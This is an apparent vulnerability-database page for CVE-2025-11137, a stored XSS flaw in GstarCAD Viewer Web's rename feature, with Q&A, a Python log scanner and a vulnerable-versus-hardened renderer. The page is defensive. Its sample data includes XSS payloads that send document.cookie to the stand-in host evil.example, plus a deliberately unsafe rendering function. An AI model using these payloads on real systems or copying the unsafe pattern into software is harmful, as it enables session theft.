CVE-2025-11137
BaseFortify
Publication date: 2025-09-29
Last updated on: 2026-04-29
Assigner: VulDB
Description
CVSS Scores
EPSS Scores
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| gstarsoft | gstarcad | 9.4.0 |
| gstarsoft | gstarcad_viewer_web | 9.4.0 |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-79 | The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. |
| CWE-94 | The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment. |
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2025-11137 is a stored cross-site scripting (XSS) vulnerability in Gstarsoft GstarCAD Viewer Web version 9.4.0, specifically in the file renaming feature. The application stores a user-supplied file name without neutralising it and later places that name into the HTML of the file list or of the renamed file's view. An attacker therefore submits a new file name containing JavaScript (a script tag, or a tag carrying an event-handler attribute such as onerror), the server keeps it, and the script executes in the browser of every user who views the page, with that user's session. This allows attackers to steal sensitive information such as cookies and session tokens (where the session cookie is not marked HttpOnly), perform unauthorized actions on behalf of users, and keep the compromise going for as long as the malicious name remains stored. The vulnerability can be exploited remotely; the only user interaction required is that a victim view the affected page. [1, 2]
How can this vulnerability impact me?
This vulnerability can impact you by allowing attackers to execute malicious scripts in your browser when you view a file list or a file that carries a maliciously renamed entry. This can lead to theft of sensitive information such as cookies and session tokens, unauthorized actions performed on your behalf inside the viewer, and compromise of user accounts that persists for as long as the payload stays stored. Because the payload travels with the stored name, any other user who opens a view that lists the renamed file is exposed too, so sharing the file broadens the attack's reach. [1]
How can this vulnerability be detected on my network or system? Can you suggest some commands?
Detection can be performed by inspecting file names handled by GstarCAD Viewer Web version 9.4.0, in particular requests to the file renaming feature, for JavaScript payloads. Since the vulnerability is stored cross-site scripting (XSS), review web application or reverse-proxy logs of rename requests for HTML tags, event-handler attributes (on...=) or javascript: URLs in the new-name value, and URL-decode the value before matching, because attackers routinely percent-encode or double-encode payloads. Note that standard access logs usually omit POST bodies, so a WAF or proxy that records request bodies may be needed to see the rename parameter at all. Also audit the names already stored on the server: a payload planted before monitoring started keeps firing until it is removed. Web vulnerability scanners that test for XSS can also identify this issue. Specific commands are not provided in the resources. [1, 2]
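As an added example (not from the cited resources or from Gstarsoft), the following Python script shows the log-side check described above: it parses constructed access-log lines, picks out rename requests, fully URL-decodes the new-name parameter, and flags values that look like script rather than a file name. The endpoint path /viewer/rename, the parameter newName and the log lines themselves are assumptions made for the illustration; the real product's endpoint is not documented on this page, so map them to what your deployment logs.

```python
import re
from urllib.parse import unquote, urlsplit, parse_qs

# Constructed sample access-log lines (common log format). They are not real
# GstarCAD Viewer Web logs: the /viewer/rename endpoint and the newName
# parameter are assumptions for this example. Lines 2 and 3 carry encoded XSS
# payloads (line 3 is double-encoded); line 5 is a benign name containing '<'.
SAMPLE_LOG = """\
10.0.0.5 - alice [29/Sep/2025:10:12:01 +0000] "GET /viewer/rename?fileId=41&newName=site-plan-v2.dwg HTTP/1.1" 200 512
10.0.0.7 - bob [29/Sep/2025:10:13:44 +0000] "GET /viewer/rename?fileId=42&newName=%3Cscript%3Efetch('//evil.example/'%2Bdocument.cookie)%3C%2Fscript%3E HTTP/1.1" 200 512
10.0.0.7 - bob [29/Sep/2025:10:14:02 +0000] "GET /viewer/rename?fileId=43&newName=%253Cimg%2520src%253Dx%2520onerror%253Dalert(1)%253E HTTP/1.1" 200 512
10.0.0.9 - carol [29/Sep/2025:10:15:10 +0000] "GET /viewer/list HTTP/1.1" 200 2048
10.0.0.9 - carol [29/Sep/2025:10:16:30 +0000] "GET /viewer/rename?fileId=44&newName=floor%20%3C%20roof.dwg HTTP/1.1" 200 512
"""

LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

RENAME_PATH = "/viewer/rename"   # assumed endpoint
NAME_PARAM = "newName"           # assumed parameter

# Indicators of script in a file name. A bare '<' is deliberately not enough:
# "floor < roof.dwg" is a legitimate name, "<img ... onerror=" is not.
XSS_INDICATORS = {
    "script_tag": re.compile(r"<\s*script\b", re.I),
    "event_handler": re.compile(r"<\w+[^>]*\son\w+\s*=", re.I),
    "dangerous_tag": re.compile(r"<\s*(?:svg|iframe|object|embed|math)\b", re.I),
    "javascript_url": re.compile(r"javascript\s*:", re.I),
}


def decode_fully(value, max_rounds=3):
    """URL-decode repeatedly so double-encoded payloads are revealed."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify_name(name):
    """Return the first matching indicator label, or None if the name looks benign."""
    for label, pattern in XSS_INDICATORS.items():
        if pattern.search(name):
            return label
    return None


def scan_log(text):
    """Return a finding for every rename request whose new name looks like a payload."""
    findings = []
    for line_no, raw in enumerate(text.splitlines(), start=1):
        m = LOG_LINE.match(raw)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        if parts.path != RENAME_PATH:
            continue
        # parse_qs does one round of percent-decoding; decode_fully catches the rest.
        for candidate in parse_qs(parts.query, keep_blank_values=True).get(NAME_PARAM, []):
            name = decode_fully(candidate)
            label = classify_name(name)
            if label:
                findings.append({"line": line_no, "user": m.group("user"),
                                 "indicator": label, "new_name": name})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line']}: user={f['user']} indicator={f['indicator']} name={f['new_name']!r}")
```

Run against a real log, the same parser only needs the endpoint and parameter names changed; if the rename goes over POST, feed it the body-logging output of your proxy or WAF instead, since the request line alone will not contain the name.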
What immediate steps should I take to mitigate this vulnerability?
The immediate recommended action is to apply the official patch provided by Gstarsoft Co., Ltd. for GstarCAD up to version 9.4.0. Until the patch is applied, restrict access to the file renaming functionality if possible, audit and clean any stored file names that already contain markup, and warn users that merely viewing a shared file list can trigger the payload. The root-cause fix for CWE-79 is to HTML-encode file names wherever they are written into a page; validating new names against an allowlist in the rename handler adds defence in depth, and a Content Security Policy that blocks inline script limits the impact while you wait for the vendor fix. [1, 2]
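To make the mechanism from the first answer and the fix from this one concrete, here is an added example (not Gstarsoft's code, and the product's real rendering stack is not known from this page) in Python: a vulnerable file-list renderer that concatenates stored names into markup, the hardened version that encodes for both the text and the URL context, and an allowlist check for the rename handler. The sample names are constructed; the one containing a bare '<' shows why the allowlist alone is not the fix, since it rejects a harmless name that output encoding would have rendered safely.

```python
import html
import re
from urllib.parse import quote

# Constructed file names. The first is what an attacker would submit through
# the rename feature; the other two are ordinary names a user might choose.
SAMPLE_NAMES = [
    '<img src=x onerror="fetch(\'//evil.example/?c=\'+document.cookie)">.dwg',
    "site-plan-v2.dwg",
    "floor < roof.dwg",
]


def render_file_list_unsafe(names):
    """Vulnerable pattern (CWE-79): the stored name is dropped straight into the
    markup, so any tags it contains become part of the page and run for every
    viewer."""
    items = "".join(f'<li><a href="/viewer/open?name={n}">{n}</a></li>' for n in names)
    return f"<ul>{items}</ul>"


def render_file_list_safe(names):
    """Hardened version: encode for the context the value lands in. The href
    gets URL-encoding (then attribute escaping); the visible text gets HTML
    escaping. html.escape also escapes quotes, so attribute breakouts fail."""
    items = "".join(
        f'<li><a href="/viewer/open?name={html.escape(quote(n, safe=""))}">'
        f"{html.escape(n)}</a></li>"
        for n in names
    )
    return f"<ul>{items}</ul>"


# Allowlist for the rename handler: letters, digits, space, dot, underscore,
# parentheses and hyphen, not starting with a dot or space, at most 255 chars.
ALLOWED_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9 ._()\-]{0,254}$")


def is_allowed_name(name):
    """Input validation as defence in depth. It blocks the payload but also
    rejects 'floor < roof.dwg', which is why output encoding stays mandatory."""
    if not ALLOWED_NAME.fullmatch(name):
        return False
    if ".." in name:          # keep path traversal out of the stored name as well
        return False
    return True


if __name__ == "__main__":
    print("UNSAFE:", render_file_list_unsafe(SAMPLE_NAMES))
    print("SAFE:  ", render_file_list_safe(SAMPLE_NAMES))
    for n in SAMPLE_NAMES:
        print(f"allowlist {'accepts' if is_allowed_name(n) else 'rejects'} {n!r}")
```

Note that the unsafe output contains a live img tag with an onerror handler, whereas the safe output shows the same characters as literal text and a percent-encoded URL; that difference, not the allowlist, is what closes CWE-79.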